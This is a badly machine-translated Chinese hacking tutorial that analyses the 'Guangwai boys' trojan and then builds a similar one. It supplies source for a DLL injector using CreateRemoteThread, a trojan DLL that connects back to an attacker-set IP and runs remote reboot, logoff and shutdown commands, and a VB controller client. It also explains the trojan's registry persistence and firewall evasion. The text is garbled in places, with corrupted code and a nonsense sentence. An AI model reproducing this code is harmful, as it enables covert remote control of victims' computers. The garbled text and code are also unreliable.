Code Analysis of boys and girls from across China

Code Analysis of boys and girls from across China

Guangwai boys' remote control software is a professional remote control and network monitoring tool developed by guangwai programmer Network (former guangwai Female Network Team.

In addition to the features that common trojans should have, boys from guangwai also have unique characteristics:
1. The client is highly imitation of Windows Resource Manager: In addition to fully supporting access to the file system of the remote server, it also supports access to the shared resources of other machines on the Intranet of the other party through the "Network neighbors" of the other party!
2. Powerful file operations: You can create a folder on a remote machine and delete the entire folder (connected to sub-directories and files) at a time. You can select multiple files for upload, download, and other basic functions. In addition, it supports high-speed remote file search and allows you to download and delete search results!
3. using the techniques of "rebound port principle" and "thread insertion": using the currently popular bounce Port Trojan technology, the server actively connects to the client, therefore, you can access a computer on the Internet that accesses the Internet through a NAT proxy (transparent proxy) in the LAN, and easily pass through the firewall (including: Packet Filter and proxy firewall ).

Boys outside Guangzhou look pretty (HA, after all, they specialize in Trojans, ^ _ ^). I recently made a preliminary research on this newer Trojan! I configured a trojan according to the Help file and made an experiment on my PC ......
Boys outside Guangzhou have hidden the server. Only when the server is running will the server process be exposed to the task manager for a short time, but it is a flash! According to the configuration of boys outside China, we can know that it uses DLL injection into remote processes! Using DLL to insert a thread to the Windows system process (such as Explorer), there is no separate process. We use the registry monitoring tool to copy ourselves to the System32 directory and add ourselves to HKEY_LOCAL_MACHINE/software/Microsoft/Windows/CurrentVersion/run, copy a DLL that is parasitic to the process to the System32 directory and write it to the Registry randomly. The location is not fixed. restart the system to start itself with the system process. It is very troublesome to manually scan and kill! The location of the DLL is not fixed because of Windows. The DLL is registered to windows. You can use the regsvr32 command to register the DLL manually or implement the program, but it is not covered in this article. As for port rebound, it is very easy to connect the server to the client. There are two Connection Methods for boys outside China, one for a fixed IP address and the other for a dynamic IP address. There is no technology for a fixed IP address. The server directly connects to the client. The Dynamic IP address is oriented through the intermediate proxy (because its IP address is fixed), which is equivalent to the zombie we use. By configuring the client, an HTM page is generated. Of course, the data is encrypted. Each time the server starts, it tries to obtain the file and decrypts the content to obtain the latest IP address and the connected port. The main code is as follows:

Char * request = "Get/guestbook.htm"; // The default generation page for boys outside China
Char buffer [2000];
Destsockaddr. sin_family = af_inet;
Destsockaddr. sin_port = htons (80 );
Desksocketaddr. sin_addr.s_addr = inet_addr (dest_ip_addr); // proxy IP Address
Destsocket = socket (af_inet, sock_stream, 0 );
Connect (destsocket, (lpsockaddr) & destsockaddr, sizeof (destsockaddr ));
Send (destsocket, request, strlen (request) + 1, 0 );
Recv (destsocket, buffer, 2000,0); (continued)
　
Buffer is the content of the entire guestbook, including the HTTP header. You can analyze the content to obtain the details of the client!

Knowing how it works, its mystery will soon be uncovered! We can use programming. To find out the implementation method, we must first understand another kind of "executable file"-DLL in windows. dll is the abbreviation of dynamic link library (dynamic link library, DLL files are the basis of windows, because all API functions are implemented in DLL. A dll file has no program logic and consists of Multiple Functional functions. It cannot run independently. Generally, it is loaded and called by processes. There are many DLL running methods, but the most concealed method is dynamic embedding technology. Dynamic embedding technology refers to embedding your code into a running process. Theoretically, every process in Windows has its own private memory space. Other processes are not allowed to operate on this private space, but in fact, we can still use various methods to access and operate the private memory of the process. There are multiple dynamic embedding technologies, such as window hook, hook api, and remote thread. Here we will introduce the remote thread technology, as long as it has basic online and dynamic link library knowledge, it can easily complete dynamic embedding. Remote thread technology refers to the process's memory address space by creating a remote thread in another process. The key of the program is to use loadlibrarya (w) API in kernel32.dll to obtain the function entry address of the dynamic link library, and then run the code after this address! Because in the main soup, the lips are frozen, the lips are frozen, and the lips are frozen. the disconnects the accesskey and obtains the permission of _ debug_name to insert the remote thread! OK, we will use the code below to implement it!

/*************************************** ******
* Inject. c => inject.exe
* Author: leonshoh Wong
**************************************** ****/
# Include <windows. h>
# Include <stdio. h>
# Include <tlhelp32.h>

Handle hremotethread, hremoteprocess;
DWORD dwremoteprocessid;
Pwstr pszlibfileremote = NULL;

DWORD processtopid (char * PID) // find the PID (process ID) of the specified process)
{
Handle hprocesssnap = NULL;
Char buffer [max_path];
Processentry32 pe32 = {0 };
Int I;
Hprocesssnap = createconlhelp32snapshot (th32cs_snapprocess, 0); // open the process Snapshot
If (hprocesssnap = (handle)-1)
{
Printf ("/ncreatemedilhelp32snapshot () error: % d", getlasterror ());
Return 0;
}
Pe32.dwsize = sizeof (processentry32 );
If (process32first (hprocesssnap, & pe32) // start the enumeration process
{
Do
{
Strcpy (buffer, pe32.szexefile );
For (I = strlen (buffer); I> 0; I --) // capture process name
If (buffer [I] = '//')
Break;
If (! Strcmp (PID, & buffer [I]) // determines whether it is consistent with the provided process name. Yes, the returned process ID
Return pe32.th32processid;
}
While (process32next (hprocesssnap, & pe32); // continue the enumeration process
}
Else
{
Printf ("/nprocess32first () error: % d", getlasterror ());
Return 0;
}
Closehandle (hprocesssnap); // closes the handle of the system process Snapshot
Return 0;
}

Bool setprivilege () // This function is used to escalate the permission to se_debug_name.
{
Token_privileges tkp;
Handle htoken;
If (! Openprocesstoken (getcurrentprocess (), token_adjust_privileges | token_query, & htoken) // failed to open the current process
Return false;
Lookupprivilegevalue (null, se_debug_name, & tkp. Privileges [0]. luid); // view the current permission
Tkp. privilegecount = 1;
Tkp. Privileges [0]. Attributes = se_privilege_enabled;
Adjusttokenprivileges (htoken, false, & tkp, 0, (ptoken_privileges) null, 0); // adjust the permission, as set above
Return true;
}

Int main ()
{
Int CB;
Pthread_start_routine pfnstartaddr;
DWORD threadid = 0;
Char pszlibfilename [max_path];
Dwremoteprocessid = processtopid ("notepad.exe"); // obtain the PID of notepad. Of course, you can also obtain the PID of EXPLORER. EXE. However, it will remain in the memory until the process is completed!
Getcurrentdirectory (max_path, pszlibfilename); // obtain the current directory path.
If (pszlibfilename [strlen (pszlibfilename)-1]! = '//') // Determines whether the root directory is used.
Strcat (pszlibfilename, "file: // Trojan. dll /");
Else
Strcat (pszlibfilename, "Trojan. dll"); // File Name of the dynamic connection library to be inserted (Trojan. dll)
 
 
If (! Setprivilege ())
{
Printf ("error in setprivilege (): % d/N", getlasterror ());
Return 1;
}
 
Hremoteprocess = OpenProcess (process_create_thread | process_vm_operation | process_vm_write, false, dwremoteprocessid); // open the process of notepad.exe to get the process handle. Pay attention to the first parameter (the permission to open the handle setting)
 
If (! Hremoteprocess)
{
Printf ("remote process not exist or access denied/N ");
Return-1;
}
 
CB = (1 + strlen (pszlibfilename) * sizeof (char); // calculate the DLL file name length
 
Pszlibfileremote = virtualallocex (hremoteprocess, null, CB, mem_commit, page_readwrite); // apply for a file name storage space
 
If (! Pszlibfileremote)
{
Printf ("virtualallocex () error: % d", getlasterror ());
Return-1;
}
 
If (! Writeprocessmemory (hremoteprocess, pszlibfileremote, (pvoid) pszlibfilename, CB, null) // write the DLL file name to the requested space
{
Printf ("writeprocessmemory () error: % d", getlasterror ());
Return-1;
}
 
Pfnstartaddr = (pthread_start_routine) getprocaddress (getmodulehandle ("kernel32.dll"), "loadlibrarya"); // obtain the function address of the Dynamic Link Library
 
If (! Pfnstartaddr)
{
Printf ("getprocaddress () error: % d/N", getlasterror ());
Return-1;
}
 
Hremotethread = createremotethread (hremoteprocess, null, 0, pfnstartaddr, pszlibfileremote, 0, & threadid); // create a remote thread and use the DLL file name as the parameter of the remote thread
Printf ("inject successfully/N ");
 
If (! Hremotethread)
{
Printf ("createremotethread () error: % d/N", getlasterror ());
Return-1;
}
 
Waitforsingleobject (hremotethread, infinite); // wait. In fact, you can set a timeout value. Here is an infinite wait. This sentence must be written. If it is not written, an error will occur. I have already tried it.
If (pszlibfileremote! = NULL) // The following is the cleaning process. You don't have to talk about it more!
{
Virtualfreeex (hremoteprocess, pszlibfileremote, 0, mem_release );
}
If (hremotethread! = NULL)
{
Closehandle (hremotethread );
}
If (hremoteprocess! = NULL)
{
Closehandle (hremoteprocess );
}
Printf ("/ndone! ");
Return 0;
 
}

Okay. I have finished writing the inserted program. It's easy! If you are in trouble, prepare a reference manual for winapi reference at any time. Next, we will write a Trojan with the initial function of the Trojan dynamic Connection Library. Oh, there is also a port rebound! Used to test whether the injection program is correct! Here we are only used for testing. The server uses a single thread and can only be connected once. Of course you can restart the server!

// Trojan. cpp: defines the entry point for the DLL application.
/*************************************** ************************
* Trojan. c => Trojan. dll
* Author: leonshoh Wong
* E-mail: leonshoh@hackbase.net
**************************************** ***********************/

# Include <windows. h>
# Include <Winsock. h>
# Define no_flags_set 0
# Define Port 80 // remote connection port (usually used by HTTP tunneling technology)
# Define dest_ip_addr "127.0.0.1" // remote IP address to be connected (Use Your bot here)

Int startsocket ();
Void recy (char *, INT );
Void docmd (char *);
Bool enableprivilege (lptstr );

Void showerror (char * function) // function with an error prompt
{
Char buffer [max_path];
Memset (buffer, 0x0, max_path );
Wsprintf (buffer, "% s error: % d", function, getlasterror ());
MessageBox (null, buffer, "error", mb_ OK );
}

Bool apientry dllmain (handle hmodule,
DWORD ul_reason_for_call,
Lpvoid lpreserved
) // The portal to dynamically connect to the database, which is equivalent to the main () function.
{
Switch (ul_reason_for_call)
{
Case dll_process_attach:
{
Dword id;
Createthread (null, 0, (lpthread_start_routine) startsocket, null, 0, & ID );
Break;
}
Default:
Break;
}
Return true;
}

Int startsocket ()
{
Char buffer [25000]; // buffer (large enough to avoid Buffer Overflow)
Wsadata data;
Sockaddr_in destsockaddr;
Socket destsocket;
Unsigned long destaddr;
Int status, numsnt;
MessageBox (null, "the DLL injected successfully! "," Success ", mb_ OK); // prompt thread injection code to run successfully!
Status = wsastartup (makeword (1.1), & data); // start Winsock. the version we use here is. In the same way, Winsock is backward compatible.
If (Status)
{
Showerror ("wsastartup ()");
Return 1;
}
Destaddr = inet_addr (dest_ip_addr );
Memcpy (& destsockaddr. sin_addr, & destaddr, sizeof (destaddr ));
Destsockaddr. sin_family = af_inet; // Internet
Destsockaddr. sin_port = htons (port); // write the port in the Structure
Destsocket = socket (af_inet, sock_stream, 0); // create a socket
If (destsocket = invalid_socket)
{
Showerror ("socket ()");
Return 1;
}
Do
{
Status = connect (destsocket, (lpsockaddr) & destsockaddr, sizeof (destsockaddr ));
Sleep (250 );
}
While (status = socket_error); // connect to the client every 250 milliseconds. If the connection continues
While (true)
{
Numsnt = Recv (destsocket, buffer, strlen (buffer) + 1, no_flags_set); // accept commands sent from the client
Buffer [numsnt] = 0x0;
Recy (buffer, numsnt); // parse and execute the command
Sleep (100 );
}
 
Return true;
}
Void recy (char * cmd, int num)
{
Char buffer [25000];
Strcpy (buffer, CMD );
Buffer [num + 1] = 0x0;
Buffer [3] = 0x0;
If (! Strcmp (buffer, "cmd") // compare command. If it is a command, it is handed to the docmd () function for processing.
Docmd (& cmd [4]);
If (! Strcmp (buffer, "MSG") // if the message is sent, the message is displayed.
MessageBox (null, & buffer [4], "alert", mb_ OK );
}

Bool enableprivilege (lptstr privilege) // escalate permissions (NT, 2 k programs must have sufficient permissions to shut down)
{
Handle token;
Luid;
Token_privileges tokenprivileges;
If (! Openprocesstoken (getcurrentprocess (), token_adjust_privileges | token_query, & token ))
{
Showerror ("openprocesstoken ()");
Return false;
}
If (! Lookupprivilegevalue (0, privilege, & luid ))
{
Showerror ("lookupprivilegevalue ()");
Return false;
}
Tokenprivileges. privilegecount = 1;
Tokenprivileges. Privileges [0]. luid = luid;
Tokenprivileges. Privileges [0]. Attributes = se_privilege_enabled;
Adjusttokenprivileges (token, false, & tokenprivileges, 0, 0 );
Return true;
}

Void docmd (char * cmd)
{
If (! Strcmp (CMD, "reboot") // restart the computer
{
If (enableprivilege (se_shutdown_name ))
Exitwindowsex (ewx_reboot, 0 );
}
If (! Strcmp (CMD, "logoff") // deregister
{
If (enableprivilege (se_shutdown_name ))
Exitwindowsex (ewx_logoff, 0 );
}
If (! Strcmp (CMD, "showdown") // Shutdown
{
If (enableprivilege (se_shutdown_name ))
Exitwindowsex (ewx_force, 0 );
}
}
 
Okay, the server has written it. Let's test it. Note: Put the exeand dllfiles in the same directory, execute inject.exe, and 3:

Is there anything missing? Yes. How can I control the client without it ?? Someone may say that a trojan like a blue flame can be connected via Telnet without the developer's client. However, this is a port bounce Trojan and cannot be connected to the server by a client. However, soon, we wrote a client using VB, which everyone is familiar with. By using the Winsock Control, we solved the problem in a few words. Well, we started work!

/*************************************** **********************
'* This is the client of Trojan
'* Author: leonshoh
'* E-mail: leonshoh2236@hotmail.com
'*************************************** **********************/
Private sub form_load ()
Logoff. Enabled = false' // set all button controls to unavailable before connection to avoid errors
Reboot. Enabled = false
Shutdown. Enabled = false
Send. Enabled = false
Socket. localprot = 80' // listen on port 80
Socket. Listen' // start listening
End sub

Private sub logoff_click ()
Socket. senddata "cmd_logoff"
End sub

Private sub reboot_click ()
Socket. senddata "cmd_reboot"
End sub

Private sub send_click ()
Socket. senddata "MSG _" & text1.text
Text1.text = "" '// clear the text box after a message is sent
End sub

Private sub shutdown_click ()
Socket. senddata "cmd_shutdown"
End sub '// The preceding command is sent to the server and transferred to the server for execution.

Private sub socket_connectionrequest (byval requestid as long)
If socket. State <> sckclosed then '// check the status after receiving the request. If the socket is not closed, disable it.
Socket. Close
End if
Socket. Accept requested '// accepts client requests
Msgbox "the trojan has connected", vbokonly, "alert" '// you are prompted that the connection has been established.
Logoff. Enabled = true
Reboot. Enabled = true
Shutdown. Enabled = true
Send. Enabled = true // restore button, available
End sub

Well, let's execute all the procedures written in the notebook. Run inject.exeand then run client.exe. Look, the server is connected. It's successful! (Figure 4)

All right, a simple DLL injection and port bounce Trojan will be implemented! Of course, a powerful trojan has powerful functions. To implement these functions, you need to understand many details about system programming. For details, refer to shotgun's "unveil the secret of a Trojan". we are very inspired! I will not repeat the content here!
Here, I don't encourage everyone to write Trojans, but want to explain that this is actually the case behind the secret. Due to my limited technology, mistakes are inevitable. Please advise.